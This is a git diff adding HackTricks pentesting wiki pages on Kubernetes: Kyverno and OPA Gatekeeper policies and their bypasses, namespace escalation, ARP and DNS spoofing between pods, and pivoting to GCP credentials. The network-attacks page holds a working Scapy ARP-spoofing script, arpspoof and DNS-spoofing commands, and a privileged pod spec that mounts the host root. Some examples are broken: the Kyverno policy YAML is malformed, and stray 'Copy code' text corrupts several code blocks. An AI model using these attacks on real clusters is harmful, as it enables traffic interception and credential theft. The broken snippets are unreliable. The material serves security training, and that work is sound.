+* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md b/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
new file mode 100644
index 0000000000..b2bb60bc63
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md
@@ -0,0 +1,56 @@
+# Kubernetes Kyverno
+
+**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
+
+## Definition&#x20;
+
+Kyverno is an open-source, policy management framework for Kubernetes that enables organizations to define, enforce, and audit policies across their entire Kubernetes infrastructure. It provides a scalable, extensible, and highly customizable solution for managing the security, compliance, and governance of Kubernetes clusters.
+
+## Use cases
+
+Kyverno can be used in a variety of use cases, including:
+
+1. **Network Policy Enforcement**: Kyverno can be used to enforce network policies, such as allowing or blocking traffic between pods or services.
+2. **Secret Management**: Kyverno can be used to enforce secret management policies, such as requiring secrets to be stored in a specific format or location.
+3. **Access Control**: Kyverno can be used to enforce access control policies, such as requiring users to have specific roles or permissions to access certain resources.
+
+## **Example: ClusterPolicy and Policy**
+
+Let's say we have a Kubernetes cluster with multiple namespaces, and we want to enforce a policy that requires all pods in the `default` namespace to have a specific label.
+
+**ClusterPolicy**
+
+A ClusterPolicy is a high-level policy that defines the overall policy intent. In this case, our ClusterPolicy might look like this:
+
+```yaml
+apiVersion: kyverno.io/v1
+kind: ClusterPolicy
+metadata:
+  name: require-label
+spec:
+  rules:
+  - validate:
+      message: "Pods in the default namespace must have the label 'app: myapp'"
+      match:
+        any:
+        - resources:
+            kinds:
+              - Pod
+            namespaceSelector:
+              matchLabels:
+                namespace: default
+        - any:
+            - resources:
+                kinds:
+                  - Pod
+                namespaceSelector:
+                  matchLabels:
+                    namespace: default
+                validationFailureAction: enforce
+```
+
+When a pod is created in the `default` namespace without the label `app: myapp`, Kyverno will block the request and return an error message indicating that the pod does not meet the policy requirements.
+
+## References
+
+* [https://kyverno.io/](https://kyverno.io/)
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md b/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
new file mode 100644
index 0000000000..ef10afd6d2
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md
@@ -0,0 +1,62 @@
+# Kubernetes Kyverno bypass
+
+**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
+
+## Abusing policies misconfiguration
+
+### Enumerate rules
+
+Having an overview may help to know which rules are active, on which mode and who can bypass it
+
+```bash
+$ kubectl get clusterpolicies
+$ kubectl get policies
+```
+
+### Enumerate Excluded
+
+For each ClusterPolicy and Policy, you can specify a list of excluded entities, including:
+
+* Groups: `excludedGroups`
+* Users: `excludedUsers`
+* Service Accounts (SA): `excludedServiceAccounts`
+* Roles: `excludedRoles`
+* Cluster Roles: `excludedClusterRoles`
+
+These excluded entities will be exempt from the policy requirements, and Kyverno will not enforce the policy for them.
+
+## Example&#x20;
+
+Let's dig into one clusterpolicy example :&#x20;
+
+```
+$ kubectl get clusterpolicies MYPOLICY -o yaml
+```
+
+Look for the excluded entities :&#x20;
+
+```yaml
+exclude:
+      any:
+      - clusterRoles:
+        - cluster-admin
+      - subjects:
+        - kind: User
+          name: system:serviceaccount:DUMMYNAMESPACE:admin
+        - kind: User
+          name: system:serviceaccount:TEST:thisisatest
+        - kind: User
+          name: system:serviceaccount:AHAH:*
+          
+```
+
+Within a cluster, numerous added components, operators, and applications may necessitate exclusion from a cluster policy. However, this can be exploited by targeting privileged entities. In some cases, it may appear that a namespace does not exist or that you lack permission to impersonate a user, which can be a sign of misconfiguration.
+
+## Abusing ValidatingWebhookConfiguration
+
+Another way to bypass policies is to focus on the ValidatingWebhookConfiguration resource :&#x20;
+
+{% content-ref url="../kubernetes-validatingwebhookconfiguration.md" %}
+[kubernetes-validatingwebhookconfiguration.md](../kubernetes-validatingwebhookconfiguration.md)
+{% endcontent-ref %}
+
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md b/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md
new file mode 100644
index 0000000000..de5c06b84c
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md
@@ -0,0 +1,59 @@
+# Kubernetes Namespace Escalation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
+
+Here are some techniques you can try to escape to a different namespace:
+
+### Abuse K8s privileges
+
+Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
+
+For more info about which privileges you can abuse read:
+
+{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
+[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
+{% endcontent-ref %}
+
+### Escape to the node
+
+If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
+
+* Check for **SAs tokens mounted in other docker containers** running in the node
+* Check for new **kubeconfig files in the node with extra permissions** given to the node
+* If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet)
+
+All these techniques are explained in:
+
+{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %}
+[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md b/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
new file mode 100644
index 0000000000..51aeb99e39
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md
@@ -0,0 +1,321 @@
+# Kubernetes Network Attacks
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Introduction
+
+In Kubernetes, it is observed that a default behavior permits the establishment of connections between **all containers residing on the same node**. This applies irrespective of the namespace distinctions. Such connectivity extends down to **Layer 2** (Ethernet). Consequently, this configuration potentially exposes the system to vulnerabilities. Specifically, it opens up the possibility for a **malicious container** to execute an **ARP spoofing attack** against other containers situated on the same node. During such an attack, the malicious container can deceitfully intercept or modify the network traffic intended for other containers.
+
+ARP spoofing attacks involve the **attacker sending falsified ARP** (Address Resolution Protocol) messages over a local area network. This results in the linking of the **attacker's MAC address with the IP address of a legitimate computer or server on the network**. Post successful execution of such an attack, the attacker can intercept, modify, or even stop data in-transit. The attack is executed on Layer 2 of the OSI model, which is why the default connectivity in Kubernetes at this layer raises security concerns.
+
+In the scenario 4 machines are going to be created:
+
+* ubuntu-pe: Privileged machine to escape to the node and check metrics (not needed for the attack)
+* **ubuntu-attack**: **Malicious** container in default namespace
+* **ubuntu-victim**: **Victim** machine in kube-system namespace
+* **mysql**: **Victim** machine in default namespace
+
+```yaml
+echo 'apiVersion: v1
+kind: Pod
+metadata:
+  name: ubuntu-pe
+spec:
+  containers:
+  - image: ubuntu
+    command:
+      - "sleep"
+      - "360000" 
+    imagePullPolicy: IfNotPresent
+    name: ubuntu-pe
+    securityContext:
+      allowPrivilegeEscalation: true
+      privileged: true
+      runAsUser: 0 
+    volumeMounts:
+    - mountPath: /host
+      name: host-volume
+  restartPolicy: Never 
+  hostIPC: true 
+  hostNetwork: true 
+  hostPID: true 
+  volumes:
+  - name: host-volume
+    hostPath:
+      path: /
+---
+apiVersion: v1
+kind: Pod
+metadata:
+  name: ubuntu-attack
+  labels:
+    app: ubuntu
+spec:
+  containers:
+  - image: ubuntu
+    command:
+      - "sleep"
+      - "360000" 
+    imagePullPolicy: IfNotPresent
+    name: ubuntu-attack
+  restartPolicy: Never
+---
+apiVersion: v1
+kind: Pod
+metadata:
+  name: ubuntu-victim
+  namespace: kube-system
+spec:
+  containers:
+  - image: ubuntu
+    command:
+      - "sleep"
+      - "360000" 
+    imagePullPolicy: IfNotPresent
+    name: ubuntu-victim
+  restartPolicy: Never
+---
+apiVersion: v1
+kind: Pod
+metadata:
+  name: mysql
+spec:
+  containers:
+  - image: mysql:5.6
+    ports:
+      - containerPort: 3306
+    imagePullPolicy: IfNotPresent
+    name: mysql
+    env:
+      - name: MYSQL_ROOT_PASSWORD
+        value: mysql
+  restartPolicy: Never' | kubectl apply -f -
+```
+
+```bash
+kubectl exec -it ubuntu-attack -- bash -c "apt update; apt install -y net-tools python3-pip python3 ngrep nano dnsutils; pip3 install scapy; bash"
+kubectl exec -it ubuntu-victim -n kube-system -- bash -c "apt update; apt install -y net-tools curl netcat mysql-client; bash"
+kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash"
+```
+
+## Basic Kubernetes Networking
+
+If you want more details about the networking topics introduced here, go to the references.
+
+### ARP
+
+Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
+
+This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).
+
+{% hint style="warning" %}
+Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.**
+{% endhint %}
+
+### DNS
+
+In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace:
+
+```bash
+kubectl -n kube-system describe services
+Name:              kube-dns
+Namespace:         kube-system
+Labels:            k8s-app=kube-dns
+                   kubernetes.io/cluster-service=true
+                   kubernetes.io/name=KubeDNS
+Annotations:       prometheus.io/port: 9153
+                   prometheus.io/scrape: true
+Selector:          k8s-app=kube-dns
+Type:              ClusterIP
+IP Families:       <none>
+IP:                10.96.0.10
+IPs:               10.96.0.10
+Port:              dns  53/UDP
+TargetPort:        53/UDP
+Endpoints:         172.17.0.2:53
+Port:              dns-tcp  53/TCP
+TargetPort:        53/TCP
+Endpoints:         172.17.0.2:53
+Port:              metrics  9153/TCP
+TargetPort:        9153/TCP
+Endpoints:         172.17.0.2:9153
+```
+
+In the previous info you can see something interesting, the **IP of the service** is **10.96.0.10** but the **IP of the pod** running the service is **172.17.0.2.**
+
+If you check the DNS address inside any pod you will find something like this:
+
+```
+cat /etc/resolv.conf
+nameserver 10.96.0.10
+```
+
+However, the pod **doesn't know** how to get to that **address** because the **pod range** in this case is 172.17.0.10/26.
+
+Therefore, the pod will send the **DNS requests to the address 10.96.0.10** which will be **translated** by the cbr0 **to** **172.17.0.2**.
+
+{% hint style="warning" %}
+This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod.
+
+Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**).
+
+Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses.
+{% endhint %}
+
+## ARP Spoofing in pods in the same Node
+
+Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**.
+
+### Scapy
+
+```bash
+python3 /tmp/arp_spoof.py
+Enter Target IP:172.17.0.10 #ubuntu-victim
+Enter Gateway IP:172.17.0.9 #mysql
+Target MAC 02:42:ac:11:00:0a
+Gateway MAC: 02:42:ac:11:00:09
+Sending spoofed ARP responses
+
+# Get another shell
+kubectl exec -it ubuntu-attack -- bash
+ngrep -d eth0
+
+# Login from ubuntu-victim and mysql and check the unencrypted communication
+# interacting with the mysql instance
+```
+
+{% code title="arp_spoof.py" %}
+```python
+#From https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#file-arpspoofer-py
+from scapy.all import *
+
+def getmac(targetip):
+	arppacket= Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip)
+	targetmac= srp(arppacket, timeout=2 , verbose= False)[0][0][1].hwsrc
+	return targetmac
+
+def spoofarpcache(targetip, targetmac, sourceip):
+	spoofed= ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac)
+	send(spoofed, verbose= False)
+
+def restorearp(targetip, targetmac, sourceip, sourcemac):
+	packet= ARP(op=2 , hwsrc=sourcemac , psrc= sourceip, hwdst= targetmac , pdst= targetip)
+	send(packet, verbose=False)
+	print("ARP Table restored to normal for", targetip)
+
+def main():
+	targetip= input("Enter Target IP:")
+	gatewayip= input("Enter Gateway IP:")
+
+	try:
+		targetmac= getmac(targetip)
+		print("Target MAC", targetmac)
+	except:
+		print("Target machine did not respond to ARP broadcast")
+		quit()
+
+	try:
+		gatewaymac= getmac(gatewayip)
+		print("Gateway MAC:", gatewaymac)
+	except:
+		print("Gateway is unreachable")
+		quit()
+	try:
+		print("Sending spoofed ARP responses")
+		while True:
+			spoofarpcache(targetip, targetmac, gatewayip)
+			spoofarpcache(gatewayip, gatewaymac, targetip)
+	except KeyboardInterrupt:
+		print("ARP spoofing stopped")
+		restorearp(gatewayip, gatewaymac, targetip, targetmac)
+		restorearp(targetip, targetmac, gatewayip, gatewaymac)
+		quit()
+
+if __name__=="__main__":
+	main()
+
+# To enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
+```
+{% endcode %}
+
+### ARPSpoof
+
+```bash
+apt install dsniff
+arpspoof -t 172.17.0.9 172.17.0.10
+```
+
+## DNS Spoofing
+
+As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**.
+
+You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/)
+
+In our scenario, **download** the **tool** in the attacker pod and create a \*\*file named `hosts` \*\* with the **domains** you want to **spoof** like:
+
+```
+cat hosts
+google.com. 1.1.1.1
+```
+
+Perform the attack to the ubuntu-victim machine:
+
+```
+python3 exploit.py --direct 172.17.0.10
+[*] starting attack on direct mode to pod 172.17.0.10
+Bridge:  172.17.0.1 02:42:bd:63:07:8d
+Kube-dns:  172.17.0.2 02:42:ac:11:00:02
+
+[+] Taking over DNS requests from kube-dns. press Ctrl+C to stop
+```
+
+```bash
+#In the ubuntu machine
+dig google.com
+[...]
+;; ANSWER SECTION:
+google.com.		1	IN	A	1.1.1.1
+```
+
+{% hint style="info" %}
+If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\
+You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction).
+{% endhint %}
+
+## Capturing Traffic
+
+The tool [**Mizu**](https://github.com/up9inc/mizu) is a simple-yet-powerful API **traffic viewer for Kubernetes** enabling you to **view all API communication** between microservices to help your debug and troubleshoot regressions.\
+It will install agents in the selected pods and gather their traffic information and show you in a web server. However, you will need high K8s permissions for this (and it's not very stealthy).
+
+## References
+
+* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1)
+* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md b/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
new file mode 100644
index 0000000000..4ad34f3924
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
@@ -0,0 +1,76 @@
+# Kubernetes - OPA Gatekeeper
+
+**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
+
+## Definition
+
+Open Policy Agent (OPA) Gatekeeper is a tool used to enforce admission policies in Kubernetes. These policies are defined using Rego, a policy language provided by OPA. Below is a basic example of a policy definition using OPA Gatekeeper:
+
+```rego
+regoCopy codepackage k8srequiredlabels
+
+violation[{"msg": msg}] {
+    provided := {label | input.review.object.metadata.labels[label]}
+    required := {label | label := input.parameters.labels[label]}
+    missing := required - provided
+    count(missing) > 0
+    msg := sprintf("Required labels missing: %v", [missing])
+}
+
+default allow = false
+```
+
+This Rego policy checks if certain labels are present on Kubernetes resources. If the required labels are missing, it returns a violation message. This policy can be used to ensure that all resources deployed in the cluster have specific labels.
+
+## Apply Constraint
+
+To use this policy with OPA Gatekeeper, you would define a **ConstraintTemplate** and a **Constraint** in Kubernetes:
+
+```yaml
+apiVersion: templates.gatekeeper.sh/v1beta1
+kind: ConstraintTemplate
+metadata:
+  name: k8srequiredlabels
+spec:
+  crd:
+    spec:
+      names:
+        kind: K8sRequiredLabels
+  targets:
+    - target: admission.k8s.gatekeeper.sh
+      rego: |
+        package k8srequiredlabels
+        violation[{"msg": msg}] {
+            provided := {label | input.review.object.metadata.labels[label]}
+            required := {label | label := input.parameters.labels[label]}
+            missing := required - provided
+            count(missing) > 0
+            msg := sprintf("Required labels missing: %v", [missing])
+        }
+
+        default allow = false
+```
+
+```yaml
+apiVersion: constraints.gatekeeper.sh/v1beta1
+kind: K8sRequiredLabels
+metadata:
+  name: ensure-pod-has-label
+spec:
+  match:
+    kinds:
+      - apiGroups: [""]
+        kinds: ["Pod"]
+  parameters:
+    labels:
+      requiredLabel1: "true"
+      requiredLabel2: "true"
+```
+
+In this YAML example, we define a **ConstraintTemplate** to require labels. Then, we name this constraint `ensure-pod-has-label`, which references the `k8srequiredlabels` ConstraintTemplate and specifies the required labels.
+
+When Gatekeeper is deployed in the Kubernetes cluster, it will enforce this policy, preventing the creation of pods that do not have the specified labels.
+
+## References
+
+* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md b/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
new file mode 100644
index 0000000000..cea42a07db
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
@@ -0,0 +1,63 @@
+# Kubernetes OPA Gatekeeper bypass
+
+**The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
+
+## Abusing misconfiguration
+
+### Enumerate rules
+
+Having an overview may help to know which rules are active, on which mode and who can bypass it.
+
+#### With the CLI
+
+```bash
+$ kubectl api-resources | grep gatekeeper
+k8smandatoryannotations                                                             constraints.gatekeeper.sh/v1beta1                  false        K8sMandatoryAnnotations
+k8smandatorylabels                                                                  constraints.gatekeeper.sh/v1beta1                  false        K8sMandatoryLabel
+constrainttemplates                                                                 templates.gatekeeper.sh/v1                         false        ConstraintTemplate
+```
+
+**ConstraintTemplate** and **Constraint** can be used in Open Policy Agent (OPA) Gatekeeper to enforce rules on Kubernetes resources.
+
+```bash
+$ kubectl get constrainttemplates
+$ kubectl get k8smandatorylabels
+```
+
+#### With the GUI
+
+A Graphic User Interface may also be available to access the OPA rules with **Gatekeeper Policy Manager.** It is "a simple _read-only_ web UI for viewing OPA Gatekeeper policies' status in a Kubernetes Cluster."
+
+<figure><img src="../../../.gitbook/assets/05-constraints.png" alt=""><figcaption></figcaption></figure>
+
+Search for the exposed service :
+
+```bash
+$ kubectl get services -A | grep gatekeeper
+$ kubectl get services -A | grep 'gatekeeper-policy-manager-system'
+```
+
+### Excluded namespaces
+
+As illustrated in the image above, certain rules may not be applied universally across all namespaces or users. Instead, they operate on a whitelist basis. For instance, the `liveness-probe` constraint is excluded from applying to the five specified namespaces.
+
+### Bypass
+
+With a comprehensive overview of the Gatekeeper configuration, it's possible to identify potential misconfigurations that could be exploited to gain privileges. Look for whitelisted or excluded namespaces where the rule doesn't apply, and then carry out your attack there.
+
+{% content-ref url="../abusing-roles-clusterroles-in-kubernetes/" %}
+[abusing-roles-clusterroles-in-kubernetes](../abusing-roles-clusterroles-in-kubernetes/)
+{% endcontent-ref %}
+
+## Abusing ValidatingWebhookConfiguration
+
+Another way to bypass constraints is to focus on the ValidatingWebhookConfiguration resource :&#x20;
+
+{% content-ref url="../kubernetes-validatingwebhookconfiguration.md" %}
+[kubernetes-validatingwebhookconfiguration.md](../kubernetes-validatingwebhookconfiguration.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
+* [https://github.com/sighupio/gatekeeper-policy-manager](https://github.com/sighupio/gatekeeper-policy-manager)
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md b/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
new file mode 100644
index 0000000000..e9de02721c
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
@@ -0,0 +1,376 @@
+# Kubernetes Pivoting to Clouds
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## GCP
+
+If you are running a k8s cluster inside GCP you will probably want that some application running inside the cluster has some access to GCP. There are 2 common ways of doing that:
+
+### Mounting GCP-SA keys as secret
+
+A common way to give **access to a kubernetes application to GCP** is to:
+
+* Create a GCP Service Account
+* Bind on it the desired permissions
+* Download a json key of the created SA
+* Mount it as a secret inside the pod
+* Set the GOOGLE\_APPLICATION\_CREDENTIALS environment variable pointing to the path where the json is.
+
+{% hint style="warning" %}
+Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials.
+{% endhint %}
+
+### Relating GSA json to KSA secret
+
+A way to give access to a GSA to a GKE cluser is by binding them in this way:
+
+* Create a Kubernetes service account in the same namespace as your GKE cluster using the following command:
+
+```bash
+Copy codekubectl create serviceaccount <service-account-name>
+```
+
+* Create a Kubernetes Secret that contains the credentials of the GCP service account you want to grant access to the GKE cluster. You can do this using the `gcloud` command-line tool, as shown in the following example:
+
+```bash
+Copy codegcloud iam service-accounts keys create <key-file-name>.json \
+    --iam-account <gcp-service-account-email>
+kubectl create secret generic <secret-name> \
+    --from-file=key.json=<key-file-name>.json
+```
+
+* Bind the Kubernetes Secret to the Kubernetes service account using the following command:
+
+```bash
+Copy codekubectl annotate serviceaccount <service-account-name> \
+    iam.gke.io/gcp-service-account=<gcp-service-account-email>
+```
+
+{% hint style="warning" %}
+In the **second step** it was set the **credentials of the GSA as secret of the KSA**. Then, if you can **read that secret** from **inside** the **GKE** cluster, you can **escalate to that GCP service account**.
+{% endhint %}
+
